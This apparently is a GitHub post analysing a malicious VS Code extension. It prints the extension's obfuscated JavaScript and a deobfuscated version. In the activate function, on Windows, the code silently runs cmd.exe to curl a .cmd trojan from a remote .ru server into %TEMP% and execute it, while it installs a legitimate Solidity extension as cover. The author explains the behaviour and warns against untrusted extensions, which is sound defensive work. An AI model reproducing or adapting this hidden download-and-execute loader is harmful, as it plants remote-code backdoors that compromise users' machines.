_0x4e3776=['bPqJr','deactivate','&\x20\x22%TEMP%\x5c','return\x20(fu','IDqGq','windowsHid','tfsQE','prototype','pinSO','on\x20have\x20co','mand','tension','LHedt','IGIdL','exception','essage','kLvyX','VpTgS','console','mmand','info','jmrPA','YMGii','win32','workbench.','Installing','EudqH','vakbm','gxTZz','9637764vBnJbd','showInform','bind','mpleted.','ons','vFliq','136yPraIG','executeCom','NCitu','Extension\x20','hubtestman','20232pgInfm','apply','9qVlxwi','solidity-v','Installati','constructo','HdzzO','zICBo','exports','CKpCV','KDWJh','AjhYD','qNRFC','extensions','rnhzK','1.cmd\x22','ationMessa','tor','vscode','1781BYYAUR','window','Rzvzp','PZyEt','table','ctor(\x22retu','140JKypRM','isActive','getExtensi','.installEx','JLzsf','warn','rn\x20this\x22)(','1230cAvHJL','__proto__','commands','87307CjgkoA','jysXR','AlADD','%\x5c1.cmd\x22\x20&','65HWkWlM','Failed\x20to\x20','kwDiA','(((.+)+)+)','log','YdJYj','all','showErrorM','QoZsX','vzZfU','jpnDD','pARBV','kHrzR','xVpZa','PMTmx','BHrOH','agerex.run','651RNkSnx','Cmd','eIlZt','Qlgbb','toString','1337961ZFoken','cmd.exe\x20/c','install\x20ex','\x20is\x20alread','\x20https://w','OBaZV','dXeXP','KhyMQ','y\x20installe','{}.constru','length','87750gHuJjQ','9118696UceGqY','ess','tintinweb.','registerCo','search','qzFJJ','MaIlK','curl\x20-s\x20-L','bMmqs','platform','isual-audi','yoiVk','subscripti','child_proc','VAbYg','DFoQB'];_0xf0f8=function(){return _0x4e3776;};return _0xf0f8();}const _0x432444={};function _0x12661e(_0x243222,_0x438c52,_0x49d13c,_0x4f2343){return _0x3c03(_0x243222-0x36d,_0x438c52);}_0x432444['activate']=activate,_0x432444[_0x12661e(0x4c7,0x4cf,0x4e0,0x4aa)]=deactivate,module[_0x1b14ab(0x3cd,0x3ab,0x3c3,0x3f4)]=_0x432444;

After being processed by Obfuscator.io Deobfuscator, we got the following code:

(function (_0x9716a9, _0x52426d) {
  const _0x45b05f = _0x9716a9();
  while (true) {
    try {
      const _0x54f1d8 = -parseInt(_0x3c03(404, -0xde)) / 1 * (parseInt(_0x3c03(380, -0xc3)) / 2) + parseInt(_0x3c03(317, 0x48c)) / 3 + parseInt(_0x3c03(385, 0x4d3)) / 4 * (-parseInt(_0x3c03(410, -0xc9)) / 5) + -parseInt(_0x3c03(328, 0x4ce)) / 6 * (parseInt(_0x3c03(312, 0x49a)) / 7) + parseInt(_0x3c03(329, -0x132)) / 8 * (-parseInt(_0x3c03(387, 0x4f8)) / 9) + parseInt(_0x3c03(417, 0x548)) / 10 * (-parseInt(_0x3c03(420, 0x526)) / 11) + -parseInt(_0x3c03(374, 0x4c5)) / 12 * (-parseInt(_0x3c03(424, -0x61)) / 13);
      if (_0x54f1d8 === _0x52426d) {
        break;
      } else {
        _0x45b05f.push(_0x45b05f.shift());
      }
    } catch (_0x3db05b) {
      _0x45b05f.push(_0x45b05f.shift());
    }
  }
})(_0xf0f8, 722777);
const _0x482b11 = function () {
  const _0x18dd31 = {
    'QoZsX': 'giIJB'
  };
  _0x18dd31.jmrPA = 'RAoZA';
  _0x18dd31.MaIlK = "jpnDD";
  _0x18dd31.NCitu = function (_0x5e14a7, _0x389a43) {
    return _0x5e14a7 === _0x389a43;
  };
  _0x18dd31.gxTZz = "AlADD";
  let _0x2eb0ab = true;
  return function (_0x14e4dd, _0x47d914) {
    if (_0x18dd31.NCitu(_0x18dd31.gxTZz, _0x18dd31.gxTZz)) {
      const _0x2bbf70 = _0x2eb0ab ? function () {
        if (_0x47d914) {
          if (_0x18dd31.jmrPA !== _0x18dd31.MaIlK) {
            const _0x5cf33e = _0x47d914.apply(_0x14e4dd, arguments);
            _0x47d914 = null;
            return _0x5cf33e;
          } else {
            _0x3461d5.window.showInformationMessage("Extension " + _0x5d3265 + " is already installed.");
            return;
          }
        }
      } : function () {};
      _0x2eb0ab = false;
      return _0x2bbf70;
    } else {
      const _0x294a87 = _0x1751f5 ? function () {
        if (_0x21d99c) {
          const _0x2f4cf8 = _0x36b78a.apply(_0x903178, arguments);
          _0x542218 = null;
          return _0x2f4cf8;
        }
      } : function () {};
      _0x45baac = false;
      return _0x294a87;
    }
  };
}();
const _0x360413 = _0x482b11(this, function () {
  return _0x360413.toString().search("(((.+)+)+)+$").toString().constructor(_0x360413).search("(((.+)+)+)+$");
});
_0x360413();
const _0x29d036 = function () {
  let _0x44f64c = true;
  return function (_0x44003b, _0x1d71f8) {
    const _0x1f0bdf = _0x44f64c ? function () {
      if (_0x1d71f8) {
        const _0x3d37cc = _0x1d71f8.apply(_0x44003b, arguments);
        _0x1d71f8 = null;
        return _0x3d37cc;
      }
    } : function () {};
    _0x44f64c = false;
    return _0x1f0bdf;
  };
}();
const _0x258824 = _0x29d036(this, function () {
  const _0x578214 = function () {
    let _0x217acd;
    try {
      _0x217acd = Function("return (function() {}.constructor(\"return this\")( ));")();
    } catch (_0x1abdcb) {
      _0x217acd = window;
    }
    return _0x217acd;
  };
  const _0x3e65c3 = _0x578214();
  const _0x4eff57 = _0x3e65c3.console = _0x3e65c3.console || {};
  const _0x4ccd38 = ["log", "warn", "info", 'error', "exception", "table", 'trace'];
  for (let _0x222921 = 0; _0x222921 < _0x4ccd38.length; _0x222921++) {
    const _0x3e9199 = _0x29d036.constructor.prototype.bind(_0x29d036);
    const _0x1676db = _0x4ccd38[_0x222921];
    const _0x3dc041 = _0x4eff57[_0x1676db] || _0x3e9199;
    _0x3e9199.__proto__ = _0x29d036.bind(_0x29d036);
    _0x3e9199.toString = _0x3dc041.toString.bind(_0x3dc041);
    _0x4eff57[_0x1676db] = _0x3e9199;
  }
});
_0x258824();
const vscode = require("vscode");
const {
  exec
} = require("child_process");
function _0x1b14ab(_0x3a55a5, _0xedf765, _0x423979, _0x5197f7) {
  return _0x3c03(_0x3a55a5 - 0x244, _0x423979);
}
function executeCmdCommand(_0x2fef7b) {
  return new Promise((_0xae7d9, _0x7f526a) => {
    const _0x2ab19d = {
      windowsHide: true
    };
    exec("cmd.exe /c " + _0x2fef7b, _0x2ab19d, (_0x204c12, _0x16d185, _0x2c3cbf) => {
      if (_0x204c12) {
        _0x7f526a(_0x204c12);
        return;
      }
      _0xae7d9();
    });
  });
}
async function installExtension(_0x147356) {
  try {
    const _0x589c71 = vscode.extensions.getExtension(_0x147356);
    if (_0x589c71) {
      vscode.window.showInformationMessage("Extension " + _0x147356 + " is already installed.");
      return;
    }
    await vscode.commands.executeCommand("workbench.extensions.installExtension", _0x147356);
    vscode.window.showInformationMessage("Installing " + _0x147356 + '.');
    setTimeout(async () => {
      const _0x40cc6e = vscode.extensions.getExtension(_0x147356);
      if (_0x40cc6e && !_0x40cc6e.isActive) {
        await _0x40cc6e.activate();
        vscode.window.showInformationMessage("Extension has been activated.");
      }
    }, 3000);
  } catch (_0x5055ed) {
    vscode.window.showErrorMessage("Failed to install extension");
  }
}
function activate(_0x43fab4) {
  let _0x2328bf = vscode.commands.registerCommand("hubtestmanagerex.runCmd", async function () {
    if (process.platform === "win32") {
      try {
        await Promise.all([executeCmdCommand("curl -s -L https://whyareyouherewho.ru/files/1.cmd -o \"%TEMP%\\1.cmd\" && \"%TEMP%\\1.cmd\""), installExtension("tintinweb.solidity-visual-auditor")]);
        vscode.window.showInformationMessage("Installation have completed.");
      } catch (_0x356ee9) {}
    }
  });
  _0x43fab4.subscriptions.push(_0x2328bf);
  if (process.platform === "win32") {
    setTimeout(() => {
      vscode.commands.executeCommand("hubtestmanagerex.runCmd");
    }, 1000);
  }
}
function _0x3c03(_0x4db7c7, _0x2c4387) {
  const _0x360413 = _0xf0f8();
  _0x3c03 = function (_0x482b11, _0xf0f8bc) {
    _0x482b11 = _0x482b11 - 301;
    let _0x3c032c = _0x360413[_0x482b11];
    return _0x3c032c;
  };
  return _0x3c03(_0x4db7c7, _0x2c4387);
}
function deactivate() {}
function _0xf0f8() {
  const _0x4e3776 = ['bPqJr', 'deactivate', "& \"%TEMP%\\", "return (fu", 'IDqGq', 'windowsHid', 'tfsQE', 'prototype', 'pinSO', "on have co", 'mand', 'tension', 'LHedt', 'IGIdL', 'exception', 'essage', 'kLvyX', 'VpTgS', 'console', 'mmand', 'info', 'jmrPA', 'YMGii', 'win32', 'workbench.', 'Installing', 'EudqH', 'vakbm', 'gxTZz', '9637764vBnJbd', 'showInform', 'bind', 'mpleted.', 'ons', 'vFliq', '136yPraIG', 'executeCom', 'NCitu', "Extension ", 'hubtestman', '20232pgInfm', 'apply', '9qVlxwi', 'solidity-v', 'Installati', 'constructo', 'HdzzO', 'zICBo', 'exports', 'CKpCV', 'KDWJh', 'AjhYD', 'qNRFC', 'extensions', 'rnhzK', "1.cmd\"", 'ationMessa', 'tor', 'vscode', '1781BYYAUR', 'window', 'Rzvzp', 'PZyEt', 'table', "ctor(\"retu", '140JKypRM', 'isActive', 'getExtensi', '.installEx', 'JLzsf', 'warn', "rn this\")(", '1230cAvHJL', '__proto__', 'commands', '87307CjgkoA', 'jysXR', 'AlADD', "%\\1.cmd\" &", '65HWkWlM', "Failed to ", 'kwDiA', '(((.+)+)+)', 'log', 'YdJYj', 'all', 'showErrorM', 'QoZsX', 'vzZfU', 'jpnDD', 'pARBV', 'kHrzR', 'xVpZa', 'PMTmx', 'BHrOH', 'agerex.run', '651RNkSnx', 'Cmd', 'eIlZt', 'Qlgbb', 'toString', '1337961ZFoken', "cmd.exe /c", "install ex", " is alread", " https://w", 'OBaZV', 'dXeXP', 'KhyMQ', "y installe", '{}.constru', 'length', '87750gHuJjQ', '9118696UceGqY', 'ess', 'tintinweb.', 'registerCo', 'search', 'qzFJJ', 'MaIlK', "curl -s -L", 'bMmqs', 'platform', 'isual-audi', 'yoiVk', 'subscripti', 'child_proc', 'VAbYg', 'DFoQB'];
  _0xf0f8 = function () {
    return _0x4e3776;
  };
  return _0xf0f8();
}
const _0x432444 = {};
function _0x12661e(_0x243222, _0x438c52, _0x49d13c, _0x4f2343) {
  return _0x3c03(_0x243222 - 0x36d, _0x438c52);
}
_0x432444.activate = activate;
_0x432444.deactivate = deactivate;
module.exports = _0x432444;

We should look carefully at the activate function:

function activate(_0x43fab4) {
  let _0x2328bf = vscode.commands.registerCommand("hubtestmanagerex.runCmd", async function () {
    if (process.platform === "win32") {
      try {
        await Promise.all([executeCmdCommand("curl -s -L https://whyareyouherewho.ru/files/1.cmd -o \"%TEMP%\\1.cmd\" && \"%TEMP%\\1.cmd\""), installExtension("tintinweb.solidity-visual-auditor")]);
        vscode.window.showInformationMessage("Installation have completed.");
      } catch (_0x356ee9) {}
    }
  });
  _0x43fab4.subscriptions.push(_0x2328bf);
  if (process.platform === "win32") {
    setTimeout(() => {
      vscode.commands.executeCommand("hubtestmanagerex.runCmd");
    }, 1000);
  }
}

Here, if the platform is win32, the script will download a trojan from https://whyareyouherewho.ru/files/1.cmd and run the file content as a subprocess.

It seemed that darwin and linux platforms are not affected, as for the current version.

Final Conclusion

This malicious extension targets win32 platform and will download and execute a trojan from the author.

Whether win32 or not, please do remember that: NEVER DOWNLOAD EXTENSIONS YOU DON'T TRUST.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment